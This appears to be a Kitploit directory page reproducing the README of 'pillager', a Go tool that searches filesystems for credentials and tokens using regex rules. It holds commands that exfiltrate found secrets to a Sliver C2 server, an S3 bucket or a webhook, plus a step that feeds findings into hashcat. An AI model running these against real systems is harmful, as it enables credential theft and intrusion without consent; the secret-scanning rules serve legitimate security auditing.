Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
pillager — Pillage filesystems for sensitive information with Go 🔍 | Kitploit
Tools/GitHubGitHub/brittonhayes/pillager
Vulnerability ScannersData ExfiltrationInformation GatheringPenetration TestingUtilities & FrameworksSecret DetectionRed Teaming
GitHubbrittonhayes/pillager

pillager

Pillage filesystems for sensitive information with Go 🔍

View Repository
3112249 months agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Pillager

Go Reference Latest Release Go Report Card Tests

Pillage filesystems for sensitive information with Go.

Table of Contents

  1. Summary
  2. Installation
  3. Usage
  4. Exfiltration
  5. Documentation

Summary

Pillager is designed to provide a simple means of leveraging Go's strong concurrency model to recursively search directories for sensitive information in files. Pillager does this by standing on the shoulders of a few giants. Once pillager finds files that match the specified pattern, the file is scanned using a series of concurrent workers that each take a line of the file from the job queue and hunt for sensitive pattern matches. The available pattern filters can be defined in a pillager.toml file or you can use the default ruleset.

Download Tool

Installation

Go

If you have Go setup on your system, you can install Pillager with go install

root@kitploit:~
go install github.com/brittonhayes/pillager@latest

Scoop (Windows)

root@kitploit:~
scoop bucket add pillager https://github.com/brittonhayes/pillager-scoop.git
scoop install pillager

Homebrew (OSX/Linux)

root@kitploit:~
brew tap brittonhayes/homebrew-pillager
brew install pillager

Docker Image

root@kitploit:~
docker run --rm -it ghcr.io/brittonhayes/pillager:latest hunt .

If you're looking for a binary, check the latest releases for the executable that matches your system

Usage

To see all the commands available with pillager

root@kitploit:~
# To see instructions for the entire application
pillager

# From any subcommand
pillager [cmd] --help

User Interface

Pillager provides a terminal user interface built with bubbletea if you'd like to scan for secrets interactively.

asciicast

Exfiltration

Send discovered secrets to remote destinations: Sliver C2 (loot/credential stores), S3/MinIO (cloud storage), or Webhooks (custom HTTP endpoints).

root@kitploit:~
# Sliver C2 - Send to teamserver with credential parsing
pillager hunt /target --exfil sliver \
  --sliver-config ~/.sliver-client/configs/operator.cfg

# S3/MinIO - Upload with encryption
pillager hunt /target --exfil s3 \
  --s3-bucket red-team-findings \
  --s3-endpoint https://minio.internal:9000 \
  --exfil-encrypt env:EXFIL_KEY

# Webhook - POST to custom endpoint
pillager hunt /target --exfil webhook \
  --webhook-url https://your-server.com/findings \
  --webhook-header "Authorization: Bearer token"

Security: AES-256-GCM encryption (--exfil-encrypt), TLS by default, automatic metadata (hostname, timestamp)


Configuration

Gitleaks Rules

Pillager provides full support for Gitleaks1 rules. This can either be passed in with a rules2 section in your pillager.toml file, or you can use the default ruleset by leaving the config flag blank.

root@kitploit:~
# pillager.toml
# Basic configuration
verbose = false 
redact = false 

# Rules for secret detection
[[rules]]
description = "AWS Access Key"
id = "aws-access-key"
regex = '''(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'''
tags = ["aws", "credentials"]

[[rules]]
description = "AWS Secret Key"
id = "aws-secret-key"
regex = '''(?i)aws(.{0,20})?(?-i)['\"][0-9a-zA-Z\/+]{40}['\"]'''
tags = ["aws", "credentials"]

[[rules]]
description = "GitHub Token"
id = "github-token"
regex = '''ghp_[0-9a-zA-Z]{36}'''
tags = ["github", "token"]

[[rules]]
description = "Private Key"
id = "private-key"
regex = '''-----BEGIN (?:RSA|OPENSSH|DSA|EC|PGP) PRIVATE KEY( BLOCK)?-----'''
tags = ["key", "private"]

# Allowlist configuration
[allowlist]
paths = [
    ".*/_test\\.go$",
    ".*/testdata/.*",
    ".*\\.md$",
    ".*/vendor/.*"
]
regexes = [
    "EXAMPLE_KEY",
    "DUMMY_SECRET"
] 

Built-in Output Formats

Pillager has a series of built-in output formats available. Pick your flavor!

Basic

root@kitploit:~
pillager hunt .

JSON

root@kitploit:~
pillager hunt ./example -f json | jq

JSON output is designed to work seamlessly with the amazing jq utility for easy parsing.

Wordlist

root@kitploit:~
# Use pillager to generate a new-line delimited wordlist from findings
pillager hunt . -f wordlist 
root@kitploit:~
# Use pillager to append a wordlist and then use your favorite hashcat attack mode
pillager hunt ./ -f wordlist >> rockyou.txt && hashcat -a 0 hash.txt rockyou.txt
Click to view more output formats

JSON Pretty

root@kitploit:~
pillager hunt . -f json-pretty

HTML

root@kitploit:~
pillager hunt . -f html > results.html

Markdown

root@kitploit:~
pillager hunt . -f markdown > results.md

CSV

root@kitploit:~
pillager hunt . -f csv > results.csv

Custom Go Template

root@kitploit:~
pillager hunt . --template "{{ range .}}Secret: {{.Secret}}{{end}}"

Custom Go Template from File

root@kitploit:~
pillager hunt . -t "$(cat mytemplate.tmpl)"

Custom Templates

Pillager allows you to use powerful go text/template and sprig functions to customize the output format. Here are a few template examples.

Basic

root@kitploit:~
{{ range . -}}
    File: {{ .File }}
    Secret: {{ .Secret}}
    Description: {{ quote .Description }}
{{ end -}}

Markdown Styling

root@kitploit:~
# Results

{{ range . -}}
    ## {{ .File }}
    - Location: {{.StartLine}}
{{end}}

More template examples can be found in the templates directory.

Documentation

GoDoc documentation is available on pkg.go.dev for pillager.

Development

To get involved developing features and fixes for Pillager, get started with the following:

  • Install Go
  • Install Taskfile.dev
  • Read the CONTRIBUTING.MD

Shoulders of Giants ⭐

spf13's Cobra

What is Cobra?

Cobra is a library providing a simple interface to create powerful modern CLI interfaces similar to git & go tools. Cobra is also an application that will generate your application scaffolding to rapidly develop a Cobra-based application.

If you've seen a CLI written in Go before, there's a pretty high chance it was built with Cobra. I can't recommend this library enough. It empowers developers to make consistent, dynamic, and self-documenting command line tools with ease. Some examples include kubectl, hugo, and Github's gh CLI.

Gitleaks

What is Gitleaks?

Gitleaks1 is a SAST tool for detecting hardcoded secrets like passwords, api keys, and tokens in git repos.

Gitleaks is an amazing tool for secret leak prevention. If you haven't implemented Gitleaks as a pre-commit checker, it's worth your time to check it out.

Why is Gitleaks relevant to Pillager?

Pillager implements the powerful rules functionality of Gitleaks while taking a different approach to presenting and handling the secrets found. While I have provided a baseline set of default rules, Pillager becomes much more powerful if you allow users to create rules for their own use-cases.

Check out the included rules2 for a baseline ruleset.


This goes without saying but I'm going to say it anyways: I am not responsible for any repercussions caused by your use of pillager. This tool is intended for defensive use, educational use, and security researcher use with the consent of all involved parties. Malicious behavior with pillager is in no way condoned, nor encouraged. Please use this tool responsibly and ensure you have permission to scan for secrets on any systems before doing so.

At it's core, Pillager is designed to assist you in determining if a system is affected by common sources of credential leakage as documented by the MITRE ATT&CK3 framework.

MITRE ATT&CK Technique - T1552,003 - Unsecured Credentials: Bash History

MITRE ATT&CK Technique - T1552,001 - Unsecured Credentials: Credentials In Files

Footnotes

  1. https://raw.githubusercontent.com/brittonhayes/pillager/main/%5BGitleaks%5D(https:/github.com/gitleaks/gitleaks) ↩ ↩2

  2. Gitleaks Rules Reference ↩ ↩2

  3. MITRE ATT&CK Website ↩